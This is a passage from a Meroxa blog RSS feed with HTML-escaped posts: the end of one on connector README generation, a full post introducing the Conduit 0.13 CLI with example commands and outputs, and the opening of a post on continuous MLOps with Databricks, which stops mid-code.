    &lt;span class=&quot;token comment&quot;&gt;# other parameters &lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A connector developer can then simply run &lt;code class=&quot;language-text&quot;&gt;conn-sdk-cli readmegen&lt;/code&gt; (as explained &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk/tree/main/conn-sdk-cli&quot;&gt;here&lt;/a&gt;), which will synchronize the README file with the configuration structs. Our &lt;a href=&quot;https://conduit.io/docs/&quot;&gt;documentation website&lt;/a&gt; uses the &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; file to build a dedicated documentation page for a connector.&lt;/p&gt;
&lt;h3&gt;How is a &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; populated?&lt;/h3&gt;
&lt;p&gt;The first part of a &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; (name, summary, description, version, author) is filled out manually by the connector developer. The contents of &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; are rendered into Markdown files (the connector’s README and our website), so you can use Markdown formatting here!&lt;/p&gt;
&lt;p&gt;Our &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk/tree/main/conn-sdk-cli&quot;&gt;conn-sdk-cli&lt;/a&gt; tool updates the configuration parameters in &lt;code class=&quot;language-text&quot;&gt;connector.yaml&lt;/code&gt; automatically, as part of running &lt;code class=&quot;language-text&quot;&gt;go generate&lt;/code&gt;. Detailed instructions on how to do that can be found &lt;a href=&quot;https://conduit.io/docs/developing/connectors/connector-specification/&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Next steps&lt;/h3&gt;
&lt;p&gt;You’ll find more information about how to write a Conduit connector &lt;a href=&quot;https://conduit.io/docs/developing/connectors/&quot;&gt;here&lt;/a&gt;. If you’d like to take a look at some real-world examples, feel free to explore our &lt;a href=&quot;https://conduit.io/docs/using/connectors/list/&quot;&gt;existing connectors&lt;/a&gt;. ⚡&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Try &lt;code class=&quot;language-text&quot;&gt;conn-sdk-cli readmegen&lt;/code&gt; now and streamline your connector documentation!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;💬 &lt;strong&gt;Join the Conduit community!&lt;/strong&gt; Discuss with fellow developers on &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord&lt;/a&gt; or contribute via &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub Discussions&lt;/a&gt;. Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introducing the New Conduit CLI: A Powerful Tool for Managing Your Pipelines]]></title><description><![CDATA[The Conduit 0.13 release introduces a powerful new CLI that simplifies real-time data pipeline management. With intuitive commands, developers can configure, monitor, and run pipelines directly from the terminal—eliminating complex API calls and manual configurations. Optimized for speed and efficiency, the CLI enhances deployment, troubleshooting, and high-throughput data streaming. Upgrade to Conduit 0.13 and streamline your data workflows today! Try it now with `$ conduit --help`. 🚀]]></description><link>https://meroxa.com/blog/introducing-the-new-conduit-cli-a-powerful-tool-for-managing-your-pipelines</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-the-new-conduit-cli-a-powerful-tool-for-managing-your-pipelines</guid><dc:creator><![CDATA[Maha Mustafa]]></dc:creator><pubDate>Wed, 05 Feb 2025 18:53:00 GMT</pubDate><content:encoded>&lt;p&gt;Release 0.13 of Conduit brings to you our new &lt;strong&gt;Conduit CLI&lt;/strong&gt;, designed to make configuring, managing, and running Conduit smoother than ever. Built with our open-source &lt;a href=&quot;https://github.com/ConduitIO/ecdysis&quot;&gt;Ecdysis&lt;/a&gt; library, this CLI is a game-changer for users looking for efficiency and ease of use.&lt;/p&gt;
&lt;h2&gt;Why the Conduit CLI Matters&lt;/h2&gt;
&lt;p&gt;Before this update, managing Conduit pipelines and connectors often required a mix of API calls, configuration files, and digging through documentation. The new Conduit CLI changes that by offering a &lt;strong&gt;centralized command-line interface&lt;/strong&gt; that turns these tasks into simple, accessible commands.&lt;/p&gt;
&lt;p&gt;With Conduit CLI, you can now:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Manage connectors, connector plugins, processors, processor plugins, and pipelines effortlessly&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;List and describe Conduit components directly from the terminal&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configure and run Conduit components without leaving the CLI&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Easily initialize Conduit and get started&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Built on Ecdysis: A Flexible Library for CLI Tools&lt;/h2&gt;
&lt;p&gt;The Conduit CLI is powered by &lt;a href=&quot;https://github.com/ConduitIO/ecdysis&quot;&gt;Ecdysis&lt;/a&gt;, an open-source Go library designed to simplify CLI tool development. Ecdysis is built around &lt;a href=&quot;https://github.com/spf13/cobra&quot;&gt;spf13/cobra&lt;/a&gt;, acting as a wrapper to enhance its capabilities.&lt;/p&gt;
&lt;p&gt;Ecdysis provides a structured approach to building command-line applications, with many features that include the following, among others:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;A robust command structure&lt;/strong&gt; for defining and organizing commands efficiently.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automatic configuration parsing&lt;/strong&gt;, reducing the need for manual setup.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexible flag parsing&lt;/strong&gt;, making it easy to customize command behavior.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By leveraging Ecdysis, Conduit CLI offers a consistent and extendable experience, making it easier for developers to interact with Conduit’s components using a well-architected CLI framework.&lt;/p&gt;
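To make the idea concrete, here is a stdlib-only Go sketch of the command-dispatch pattern that cobra (and Ecdysis on top of it) formalizes. All command and flag names below are invented for illustration; real Ecdysis usage is documented in its repository:

```go
// Illustrative, stdlib-only sketch of a command/flag structure.
// cobra and Ecdysis provide a much richer version of this pattern.
package main

import (
	"flag"
	"fmt"
	"os"
)

// command is a minimal stand-in for a CLI command: a name plus a
// function that runs it and returns its output.
type command struct {
	name string
	run  func(args []string) string
}

func buildCommands() []command {
	return []command{
		{name: "version", run: func([]string) string { return "v0.0.1" }},
		{name: "run", run: func(args []string) string {
			// Each command owns its flag set, mirroring per-command flags.
			fs := flag.NewFlagSet("run", flag.ContinueOnError)
			cfg := fs.String("config.path", "tool.yaml", "path to the configuration file")
			if err := fs.Parse(args); err != nil {
				return err.Error()
			}
			return "running with config " + *cfg
		}},
	}
}

// dispatch routes os.Args-style input to the matching command.
func dispatch(cmds []command, args []string) string {
	if len(args) == 0 {
		return "usage: tool [command]"
	}
	for _, c := range cmds {
		if c.name == args[0] {
			return c.run(args[1:])
		}
	}
	return "unknown command: " + args[0]
}

func main() {
	fmt.Println(dispatch(buildCommands(), os.Args[1:]))
}
```

On top of this basic pattern, cobra layers subcommand trees, generated help text, and shell completion, and Ecdysis adds structure such as automatic configuration parsing.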
&lt;h2&gt;Getting Started with Conduit CLI&lt;/h2&gt;
&lt;p&gt;To check all the available commands, simply run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit --help&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This will output a list of commands; at the time of writing, these include:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Available Commands:
  config            Shows the configuration to be used when running Conduit.
  connector-plugins Manage Connector Plugins.
  connectors        Manage Conduit Connectors.
  pipelines         Initialize and manage pipelines.
  processors        Manage Processors.
  run               Run Conduit.
  version           Show the current version of Conduit.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Each command is designed to give you control and observability over your data streaming pipelines. Let’s take a closer look at some of these key functionalities.&lt;/p&gt;
&lt;h2&gt;Initializing Conduit&lt;/h2&gt;
&lt;p&gt;The command &lt;code class=&quot;language-text&quot;&gt;conduit init&lt;/code&gt; creates the directories where you add your pipeline configuration files, connector binaries, and processor binaries. It also creates the file &lt;code class=&quot;language-text&quot;&gt;conduit.yaml&lt;/code&gt; that contains all the configuration parameters that Conduit supports.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit init

Created directory: processors
Created directory: connectors
Created directory: pipelines
Configuration file written to conduit.yaml

Conduit has been initialized!

To quickly create an example pipeline, run &apos;conduit pipelines init&apos;.
To see how you can customize your first pipeline, run &apos;conduit pipelines init --help&apos;.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can also use the &lt;code class=&quot;language-text&quot;&gt;pipelines init&lt;/code&gt; command to initialize a pipeline configuration file with your choice of source and destination. For example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit pipelines init file-to-pg --source file --destination postgres&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This will initialize a pipeline configuration file with all of the parameters for the source and destination connectors. By default, the created file is placed under the &lt;code class=&quot;language-text&quot;&gt;./pipelines&lt;/code&gt; folder; in this case, it would look like:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;version: &quot;2.2&quot;
pipelines:
  - id: example-pipeline
    status: running
    name: &quot;file-to-pg&quot;
    connectors:
      - id: example-source
        type: source
        plugin: &quot;file&quot;
        settings:
          # Path is the file path used by the connector to read/write records.
          # Type: string
          # Required
          path: &quot;&quot;
          ..
          .. # more params
          ..
          ..
      - id: example-destination
        type: destination
        plugin: &quot;postgres&quot;
        settings:
          # Key represents the column name for the key used to identify and
          # update existing rows.
          # Type: string
          # Optional
          key: &quot;&quot;
          ..
          ..
          .. # more params
          ..
          ..
          # Table is used as the target table into which records are inserted.
          # Type: string
          # Optional
          table: &apos;{{ index .Metadata &quot;opencdc.collection&quot; }}&apos;
          # URL is the connection string for the Postgres database.
          # Type: string
          # Required
          url: &quot;&quot;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Managing Connector Plugins&lt;/h2&gt;
&lt;p&gt;One of the new additions to the Conduit CLI is the ability to list and describe available connector plugins.&lt;/p&gt;
&lt;h3&gt;Listing Connector Plugins&lt;/h3&gt;
&lt;p&gt;To list all available connector plugins, run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit connector-plugins list&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This command displays a table of all the built-in and standalone connector plugins available to Conduit:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;+-------------------------------------+----------------------------------------+
|                 NAME                |                SUMMARY                 |
+-------------------------------------+----------------------------------------+
| builtin:file@v0.9.0                 | A file source and destination plugin.  |
| builtin:kafka@v0.11.1               | A Kafka source and destination plugin. |
| standalone:dynamodb@f9aeeee-dirty   | A DynamoDB source plugin for Conduit.  |
| standalone:grpc-client@v0.1.0       | A gRPC Source &amp;amp; Destination Client.    |
+-------------------------------------+----------------------------------------+&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Describing a Specific Plugin&lt;/h3&gt;
&lt;p&gt;To get more details about a specific plugin, use the &lt;code class=&quot;language-text&quot;&gt;describe&lt;/code&gt; command followed by the plugin name. For example, to learn more about the PostgreSQL plugin:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit connector-plugins describe builtin:postgres@v0.10.1&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This provides a detailed breakdown of the plugin, including the author, version, description, summary, and the parameters for both the source and destination. Here’s an example of what you’ll see:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;Name: builtin:postgres@v0.10.1
Summary: A PostgreSQL source and destination plugin for Conduit.
Author: Meroxa, Inc.
Version: v0.10.1

Source Parameters:
+--------+--------+----------------------------------+---------+-------------+
| NAME   | TYPE   | DESCRIPTION                      | DEFAULT | VALIDATIONS |
+--------+--------+----------------------------------+---------+-------------+
| url    | string | Connection string for database.  | &quot;&quot;      | [required]  |
| tables | string | List of tables to listen to.     | &quot;&quot;      | [required]  |
+--------+--------+----------------------------------+---------+-------------+

Destination Parameters:
+-------+--------+---------------------------------+-----------------------------------+-------------+
| NAME  | TYPE   | DESCRIPTION                     | DEFAULT                           | VALIDATIONS |
+-------+--------+---------------------------------+-----------------------------------+-------------+
| url   | string | Connection string for database. | &quot;&quot;                                | [required]  |
| table | string | Target table.                   | {{.Metadata[opencdc.collection]}} |             |
+-------+--------+---------------------------------+-----------------------------------+-------------+&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Running Conduit&lt;/h2&gt;
&lt;p&gt;To run Conduit directly from the CLI, simply run:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;$ conduit run&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This starts Conduit using the specified configuration.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Note: Most CLI commands require Conduit to be running for them to work properly, since they need access to the running components and their details.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Managing Pipelines, Connectors, and Processors&lt;/h2&gt;
&lt;p&gt;Beyond managing plugins, the Conduit CLI also provides access to &lt;strong&gt;pipelines, connectors, and processors&lt;/strong&gt;. These follow a similar command structure:&lt;/p&gt;
&lt;h3&gt;Pipelines&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;List all pipelines:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;conduit pipelines list&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Describe a pipeline:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;conduit pipelines describe &amp;lt;pipeline-id&gt;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Connectors&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;List all connectors:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;conduit connectors list&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Describe a connector:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;conduit connectors describe &amp;lt;connector-id&gt;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Processors&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;List all processors:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;conduit processors list&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Describe a processor:&lt;/strong&gt; &lt;code class=&quot;language-text&quot;&gt;conduit processors describe &amp;lt;processor-id&gt;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These commands give you greater observability into your Conduit pipelines and their components.&lt;/p&gt;
&lt;h2&gt;Why You Should Try Conduit CLI&lt;/h2&gt;
&lt;p&gt;The new Conduit CLI is an important addition for developers and users working with Conduit. By offering a &lt;strong&gt;fast, intuitive, and simple&lt;/strong&gt; way to manage Conduit components, the CLI will significantly &lt;strong&gt;improve productivity&lt;/strong&gt; and &lt;strong&gt;reduce complexity&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;Key Benefits:&lt;/h3&gt;
&lt;p&gt;✅ &lt;strong&gt;Easier management&lt;/strong&gt; of Conduit components via the command line&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Clear visibility&lt;/strong&gt; into available plugins and configurations&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Effortless setup&lt;/strong&gt; with the initialization commands&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Faster debugging&lt;/strong&gt; with detailed descriptions of connectors and pipelines&lt;/p&gt;
&lt;h2&gt;Get Started Today&lt;/h2&gt;
&lt;p&gt;The Conduit CLI is available now! If you haven’t already, install Conduit and give the CLI a try. For more details, check out our &lt;a href=&quot;https://conduit.io/docs/cli&quot;&gt;official documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;🚀 &lt;strong&gt;Run &lt;code class=&quot;language-text&quot;&gt;conduit --help&lt;/code&gt; and start exploring today!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As always, we welcome your feedback and contributions to help shape the future of Conduit. Get involved by starting a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions/&quot;&gt;GitHub Discussion&lt;/a&gt;, opening an &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues&quot;&gt;issue&lt;/a&gt;, or joining our &lt;a href=&quot;https://discord.meroxa.com/&quot;&gt;Discord server&lt;/a&gt; and saying hello to the team behind Conduit! Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[No More Stale Models: Mastering Continuous MLOps with Meroxa & Databricks]]></title><description><![CDATA[No More Stale Models: Master Continuous MLOps with Meroxa & Databricks  

Keep your machine learning models fresh and accurate with real-time, automated MLOps. This blog explores how Meroxa’s Conduit Platform and Databricks enable continuous model retraining, eliminating stale predictions and manual updates. Learn how to streamline data movement, real-time feature engineering, and automated ML workflows for peak performance. Whether for fraud detection, predictive maintenance, or personalized AI, discover how to scale MLOps efficiently. Stay ahead with always-on machine learning—no more stale models!]]></description><link>https://meroxa.com/blog/no-more-stale-models-mastering-continuous-mlops-with-meroxa-and-databricks</link><guid isPermaLink="false">https://meroxa.com/blog/no-more-stale-models-mastering-continuous-mlops-with-meroxa-and-databricks</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 05 Feb 2025 12:49:00 GMT</pubDate><content:encoded>&lt;p&gt;Data drives modern business success, especially in machine learning (ML). But deploying a model just once isn&apos;t enough anymore. Today&apos;s dynamic environment requires continuous learning, real-time decision-making, and automated feedback loops—core elements of MLOps (machine learning operations). This post shows you how to build a continuous MLOps pipeline using Meroxa for real-time data ingestion and stream processing, paired with Databricks for model development, deployment, and monitoring. You&apos;ll learn how to create a high-performing, low-latency ML pipeline that evolves automatically with your data.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;What Is MLOps?&lt;/h2&gt;
&lt;p&gt;MLOps (Machine Learning Operations) is the practice of creating repeatable, scalable processes for developing, deploying, and maintaining machine learning models. It applies DevOps principles—like continuous integration (CI), continuous delivery (CD), and infrastructure as code—to the machine learning lifecycle. This encompasses everything from data collection and feature engineering to model training, validation, deployment, and monitoring.&lt;/p&gt;
&lt;p&gt;Most organizations start with pilot ML projects where data scientists build models offline, test them in staging, and hand them to engineering teams for deployment. However, as ML initiatives become mission-critical, managing data pipelines, versioning models, and monitoring performance grows increasingly complex. MLOps provides the framework to address these challenges.&lt;/p&gt;
&lt;h3&gt;Importance of Real-Time Feedback Loops&lt;/h3&gt;
&lt;p&gt;Traditional ML pipelines are batch-oriented: data is collected in large chunks, processed offline, and used to retrain models periodically—often monthly or weekly. However, industries like finance, e-commerce, ad-tech, and IoT require near-real-time decisions. Even a few hours&apos; delay can mean missed revenue opportunities or undetected critical events like fraud.&lt;/p&gt;
&lt;p&gt;A real-time feedback loop enables models to learn continuously from new data and update their parameters automatically. Combined with robust streaming pipelines and well-orchestrated MLOps practices, real-time feedback helps your models:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Adapt to changing market conditions or user behavior rapidly.&lt;/li&gt;
&lt;li&gt;Reduce error rates by incorporating the latest ground truths.&lt;/li&gt;
&lt;li&gt;Uncover new patterns or anomalies that weren&apos;t visible during initial training.&lt;/li&gt;
&lt;li&gt;Provide immediate insights for operational teams and stakeholders.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In short, real-time MLOps is about transforming continuous data flows into continuously improving models.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Meroxa for Data Ingestion and Stream Processing&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt; is a real-time data platform that simplifies the creation and management of streaming data pipelines. It offers connectors for a wide range of data sources—databases, SaaS applications, event streams, and more—enabling users to ingest data seamlessly. Through its intuitive interface and APIs, Meroxa streamlines the complexity of moving data from point A to point B without requiring heavy, hand-crafted ETL processes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key capabilities&lt;/strong&gt; include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Managed Connectors&lt;/strong&gt;: Pre-built connectors for popular data systems (e.g., PostgreSQL, MySQL, MongoDB, Kafka, Salesforce).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Transformations&lt;/strong&gt;: The ability to process, filter, and enrich data on the fly as it moves through the pipeline.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Low-Code/No-Code Approach&lt;/strong&gt;: Users can design pipelines with minimal code overhead, making real-time data movement accessible to a broader team.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Event-Driven Architecture&lt;/strong&gt;: Helps ensure that new data is ingested and processed as soon as it’s available, ideal for use cases demanding low latency.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Why Meroxa Is Ideal for Real-Time MLOps&lt;/h3&gt;
&lt;p&gt;Machine learning pipelines need continuous, reliable, and high-quality data. In a continuous MLOps scenario:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Data Volume and Velocity&lt;/strong&gt;: ML pipelines often deal with large data streams—clickstream data, sensor readings, transaction logs—that are best handled by event-driven infrastructure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Quality&lt;/strong&gt;: Incomplete or inconsistent data can degrade model performance significantly. Meroxa’s transformation and monitoring features help filter noise, validate records, and maintain data hygiene.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability and Flexibility&lt;/strong&gt;: As data scales, so should the underlying pipeline. Meroxa provides auto-scaling and configuration management to handle spikes in incoming streams.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Processing&lt;/strong&gt;: Low-latency ingestion means that ML models can be retrained or updated quickly when new data indicates a shift in trends.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;By offloading the complexities of real-time ingestion and transformations to Meroxa, data teams can concentrate on building better ML models and orchestrating the MLOps pipeline, rather than wrestling with data pipeline intricacies.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Why Databricks for Model Development and Deployment?&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://databricks.com/&quot;&gt;Databricks&lt;/a&gt; offers a unified data analytics platform built on top of Apache Spark, providing a collaborative environment for data engineering, data science, and machine learning teams. Key components of Databricks relevant to MLOps include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Delta Lake&lt;/strong&gt;: A robust data storage layer that allows ACID transactions, schema enforcement, and time travel. This is crucial for maintaining consistency and auditing changes in training data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Databricks MLflow&lt;/strong&gt;: A framework for experiment tracking, model versioning, and deployment. MLflow also integrates with popular ML libraries (e.g., TensorFlow, PyTorch, scikit-learn).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Notebook Collaboration&lt;/strong&gt;: Interactive notebooks allow data scientists and engineers to develop and test models collaboratively in a scalable environment.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Job Scheduling and Workflows&lt;/strong&gt;: Automate the training, tuning, validation, and deployment steps, integrating them with external systems via REST APIs.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Seamless Integration with Meroxa&lt;/h3&gt;
&lt;p&gt;In a continuous MLOps pipeline, Databricks acts as the &lt;strong&gt;brains&lt;/strong&gt; for model training and deployment, while Meroxa handles the &lt;strong&gt;data flow&lt;/strong&gt;. The integration can be configured so that:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Live Data Flow from Meroxa to Databricks&lt;/strong&gt;: Meroxa streams data into a Delta Lake table or an ingestion endpoint that Databricks can consume.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Model Triggering&lt;/strong&gt;: As new data arrives, Databricks jobs can be triggered to retrain models or update inference pipelines.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Feedback Loop to Meroxa&lt;/strong&gt;: Databricks can push real-time predictions or insights back to a streaming pipeline, enabling downstream systems to act on them immediately.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;By combining Meroxa’s real-time data handling with Databricks’ advanced analytics and ML capabilities, organizations can bridge the gap between raw data ingestion and production-grade model deployment.&lt;/p&gt;
&lt;h3&gt;Continuous Model Training and Deployment&lt;/h3&gt;
&lt;p&gt;A hallmark of MLOps is the ability to &lt;strong&gt;continually retrain&lt;/strong&gt; and &lt;strong&gt;redeploy&lt;/strong&gt; models when performance metrics degrade or when data distribution shifts. Databricks facilitates this by:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Experiment Tracking with MLflow&lt;/strong&gt;: Each training run is logged, along with hyperparameters, metrics, and metadata. If a newer model outperforms the old one, it can be automatically promoted to production.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Model Registry&lt;/strong&gt;: Databricks’ model registry helps keep track of multiple versions of models, ensuring that only validated versions reach production environments.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Testing&lt;/strong&gt;: You can automate unit tests for data transformations, model performance tests, and integration tests to ensure that new models maintain or improve performance.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;Building Continuous MLOps Pipelines&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-02-05-125659.png&quot; alt=&quot;mermaid-diagram-2025-02-05-125659.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;The diagram above illustrates how data flows from various sources into Meroxa, then into Databricks. Once models are trained, validated, and deployed, the results feed back into the pipeline, creating a continuous loop of data and insight.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Data Sources&lt;/strong&gt;: Real-time data from transactions, sensors, or logs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Ingestion and Transformation&lt;/strong&gt;: Meroxa connectors capture and stream data. Transformations (e.g., data cleaning, enrichment) happen in flight.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Landing in Delta Lake&lt;/strong&gt;: Transformed streams land in a Delta Lake table within Databricks for structured storage and ACID compliance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Model Training Pipeline&lt;/strong&gt;: A Databricks job automatically triggers to retrain models based on new data availability or on a specific schedule (e.g., every hour or whenever X new records arrive).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Validation and Testing&lt;/strong&gt;: The newly trained model is validated against test sets. Metrics are recorded in MLflow.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Production Model Deployment&lt;/strong&gt;: If the new model passes validation thresholds, MLflow or the Databricks model registry updates the model version in the production environment.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Inference&lt;/strong&gt;: The production model can be hosted on Databricks Serving, a REST endpoint, or a streaming pipeline that connects back into Meroxa.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Continuous Feedback Loop&lt;/strong&gt;: Predictions and performance metrics are fed back into the pipeline, allowing for ongoing monitoring and retraining.&lt;/li&gt;
&lt;/ol&gt;
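&lt;p&gt;The trigger in step 4 can be sketched as a small decision policy. This is a hypothetical illustration in plain Python, not Meroxa or Databricks API code; the record and staleness thresholds are assumptions you would tune for your workload:&lt;/p&gt;

```python
from dataclasses import dataclass

@dataclass
class RetrainPolicy:
    """Decide when the training job should fire (illustrative sketch)."""
    min_new_records: int = 10_000     # retrain once this many new rows have landed
    max_staleness_hours: float = 1.0  # ...or at least once per hour regardless

    def should_retrain(self, new_records: int, hours_since_last_run: float) -> bool:
        return (new_records >= self.min_new_records
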